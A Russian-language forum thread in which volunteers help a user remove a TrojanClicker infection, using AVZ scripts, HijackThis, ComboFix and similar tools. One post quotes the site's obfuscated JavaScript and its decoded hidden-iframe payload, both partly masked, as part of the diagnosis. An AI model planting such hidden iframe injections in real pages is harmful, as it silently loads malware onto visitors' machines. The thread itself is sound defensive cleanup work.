Решена TrojanClicker и его последствия

kirey

Новый пользователь
Сообщения
23
Реакции
1
Проблема такова: Нод32 начал при загрузке браузера Opera выбавать сообщения об угрозе с сайта (ссылка удалена) о TrojanClicker. Причем на этот сайт не заходил уже очень давно. Никаких последствий это не несло поначалу. Сканирование системы самим нодом и CureIt результатов не дало. Примерно через сутки Нод выдал информацию о заражении файла QIP.EXE в автозагрузке и еще одного файла. К сожаленью не запомнил какого. Переустановить qip не удалось. Очень бы хотелось узнать что с системой и как от этого избавится). Заранее спасибо.


Прошу прощения за тему созданную в другом разделе по ошибке.
 
Последнее редактирование модератором:
Эту тему убрал. Тот раздел для файлов с карантином. :)
https://safezone.cc/forum/showthread.php?t=3031

Добавлено через 5 минут 50 секунд
С сайта грузится Trojan-Clicker.JS.Agent.h (ссылку удалил)
Там iframe:

HTML:
<iframe src="*******" width=103 height=125 style="visibility: hidden"></iframe><script>function v4a83f49dcd229(v4a83f49dcd9f7){  return(parseInt(v4a83f4*******68(v4a83*********0a6 () {var v4a83f49dd1877=2; return v4a83f49dd1877;} var v4a83f49dd0107='';for(v4a83f49dd08d6=0; v4a83f49dd08d6<v4a83f49dcf937.length; v4a83f49dd0*******d0107+=(String.fromCharCode(v4a838********7.substr(v4a83f49dd08d6, v4a83f49dd10a6()))));}return v4a83f49dd0107;} document.write(v4a83f49dcf168('3C69667*********4703A2F2F747261636B696E676C6F61642E636F6D2F652F696E646578372********23333206865696768743D323131207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>

Который означает
HTML:
<iframe name='9190' src='http://*******.com/e/index7.php' width=233 height=211 style='display:none'></iframe>

Добавлено через 13 минут 46 секунд
AVZ, меню "Файл - Выполнить скрипт" -- Скопировать ниже написанный скрипт-- Нажать кнопку "Запустить".
Код:
begin
 SearchRootkit(true, true);
 SetAVZGuardStatus(true);
 SetServiceStart('RemoveAny', 4);
 QuarantineFile('C:\WINDOWS\system32\Drivers\removeany.sys','');
 DeleteFile('C:\WINDOWS\system32\Drivers\removeany.sys');
 DeleteService('RemoveAny');
 BC_ImportALL;
 ExecuteSysClean;
 BC_Activate;
 RebootWindows(true);
end.
После выполнения скрипта компьютер перезагрузится.

Код:
begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.


Полученный архив прикрепите к этой теме согласно правил.

Пофиксить в HijackThis следующие строчки
Код:
 R3 - URLSearchHook: (no name) - - (no file)

Повторите логи.

Добавлено через 8 минут 51 секунду
Примерно через сутки Нод выдал информацию о заражении файла QIP.EXE

Таки правильно выдал.
http://habrahabr.ru/blogs/virus/66937/

Скачайте свежий дистрибутив QIP. И мой Вам совет ознакомтесь с этой темой.
 
Последнее редактирование модератором:
Спасибо большое за быстрый совет. К сожаленью выыполнить все получится только вечером. На работе QIP такую же штуку выдал, но все удачно переустановилось.
И еще один вопрос. Обязательно ли карантинить CLTest.exe? Это прога для настройки (калибровки) монитора. А в автозагрузке чтобы при включении сразу применялись предустановленные настройки.
 
kirey, нет, необязательно.

Поправил скрипт.
 
Тему с карантином создал. Логи повторяю.
 
На данный момент в логах активного заражения не видно.
Проблемы ещё какие-то наблюдаются?
 
Проблема осталась. Нод периодически продолжает выводить сообщение о Trojan-Clicker.iframe GT
 
Последнее редактирование:
Проблема на том же сайте наблюдается или и на других тоже?
 
Скачайте Malwarebytes' Anti-Malware, установите, обновите базы, выберите "Perform Full Scan", нажмите "Scan", после сканирования - Ok - Show Results (показать результаты) - нажмите "Remove Selected" (удалить выделенные). Откройте лог и скопируйте в сообщение.

Скачайте DDS или с зеркала и сохраните на рабочий стол, отключите антивирус и запустите dds.scr, когда сканирование закончится, запакуйте файлы из файлов DDS.txt и Attach.txt и вложите в сообщение
 
ТроПа
Проблема проявляется при входе в браузер. А сообщение нода о трояне именно с того же сайта.
 
Очистите временные файлы через Пуск-Программы-Стандартные-Служебные-Очистка диска или с помощью ATF Cleaner
- скачайте ATF Cleaner или с зеркала, запустите, поставьте галочку напротив Select All и нажмите Empty Selected.
- если вы используете Firefox, нажмите Firefox - Select All - Empty Selected
- нажмите No, если вы хотите оставить ваши сохраненные пароли
- если вы используете Opera, нажмите Opera - Select All - Empty Selected
- нажмите No, если вы хотите оставить ваши сохраненные пароли
 
Вот подозреваю, что в этом-то вся и проблема. Ни ATF ни Ccleaner ничего очистить не смогли. Папки с кешем в стандартном месте нет. Поиск по компу тоже ничего не дал. При этом в самой опере файлы кеша можно посмотреть. Саму оперу уже переустанавливал полностью.. Наверно нужно еще раз попытаться снести ее.
 
Поищите в папке All Users.
 
В All Users тоже ничего подобного нет.
 
kirey, пробуем так
 
Так тожет чистил. Не помогает. Завтра переустановю оперу с удалением всех закладок и настроек.
 
Даже переустановка оперы ничего не дала. Почисил кеш и кукисы заодно в IE. Результат тот же самый... Всплывает окно нода с сообщением с угрозой с того сайта.
 
Значит пойтем не стандартным путем.

Проверьте систему при помощи cureit

Скачайте ComboFix здесь, здесь или здесь и сохраните на рабочий стол.

1. Внимание! Обязательно закройте все браузеры, временно выключите антивирус, firewall и другое защитное программное обеспечение. Не запускайте других программ во время работы Combofix. Combofix может отключить интернет через некоторое время после запуска, не переподключайте интернет пока Combofix не завершит работу. Если интернет не появился после окончания работы Combofix, перезагрузите компьютер. Во время работы Combofix не нажимайте кнопки мыши, это может стать причиной зависания Combofix.
2. Запустите combofix.exe, когда процесс завершится, скопируйте текст из C:\ComboFix.txt и вставьте в следующее сообщение или запакуйте файл C:\ComboFix.txt и прикрепите к сообщению.
Прим: В случае, если ComboFix не запускается, переименуйте combofix.exe в combo-fix.exe

Подробнее в "ComboFix. Руководство по применению."

Скачайте Gmer или с зеркала. Запустите программу. После автоматической экспресс-проверки, отметьте галочкой все жесткие диски и нажмите на кнопку Scan. После окончания проверки сохраните его.
 
Высылаю логи. Проявления трояна пока вроде не было. Буду надеятся, что изчез)) Спасибо вам)
 
Назад
Сверху Снизу